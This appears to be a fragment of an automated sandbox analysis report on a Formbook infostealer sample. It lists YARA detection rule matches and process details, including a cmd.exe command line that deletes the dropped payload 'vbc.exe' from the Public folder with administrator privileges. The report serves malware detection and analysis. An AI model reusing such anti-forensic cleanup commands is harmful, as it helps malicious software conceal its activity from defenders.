                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:07:59:34
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x4ace0000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >